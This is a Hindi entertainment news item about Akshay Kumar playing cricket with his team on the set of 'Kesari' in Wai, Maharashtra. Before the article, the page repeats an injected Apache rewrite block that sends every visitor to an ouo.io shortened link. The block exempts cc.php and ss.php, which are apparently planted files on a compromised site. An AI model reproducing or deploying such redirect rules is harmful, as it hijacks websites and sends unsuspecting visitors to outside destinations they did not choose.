
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 596
Previous Nextमुंबई। बॉलीवुड के खिलाड़ी कुमार सेट पर फुल मस्ती करने के लिए जाने जाते हैं। फिलहाल 'केसरी' की शूटिंग में बिजी अक्षय यहां भी फुरसत के पल चुरा ही लेते हैं। हाल ही में उन्होंने अपनी पूरी टीम के साथ क्रिकेट खेला। इस 'मिनी टूर्नामेंट' की तस्वीर अक्षय ने अपने ट्विटर हैंडल पर शेयर की। उन्होंने लिखा, "इस साल के क्रिकेट चैंपियन्स से मिलें, 'वाई' से टीम 'केसरी'। वर्क हार्ड, प्ले हार्डर।"
फिल्म की शूटिंग महाराष्ट्र के सातारा जिले के वाई में चल रही है। इसमें अक्षय के साथ एक्ट्रेस परिणीति चोपड़ा भी अहम रोल में हैं। फिल्म मेकर करण जौहर के प्रोडक्शन तले बन रही ये फिल्म सारागढ़ी की लड़ाई पर आधारित है। इसकी डायरेक्शन की जिम्मेदारी अनुराग सिंह ने संभाल रखी है। अक्षय की ये फिल्म 2019 की होली पर रिलीज होगी। इस फिल्म में अक्षय सिख लुक में नजर आएंगे। उनकी जो तस्वीरें रिलीज की गई थीं उनमें वह बड़ी सी पगड़ी पहने नजर आ रहे थे। इस पगड़ी के लिए अक्षय ने अपने बाल भी उतरवा लिए थे। बाल उतरवाने की वजह से खबरें चल रही थीं कि वह हेयर ट्रांसप्लांट कराने वाले हैं। लेकिन बाद में इसकी असली वजह सामने आई। अक्षय का कहना था कि उन्होंने ऐसा इसलिए किया क्योंकि गर्मी में पगड़ी पहनना और उसे संभालना काफी मुश्किल हो जाता है। इसलिए उन्होंने बालों का त्याग करना बेहतर समझा।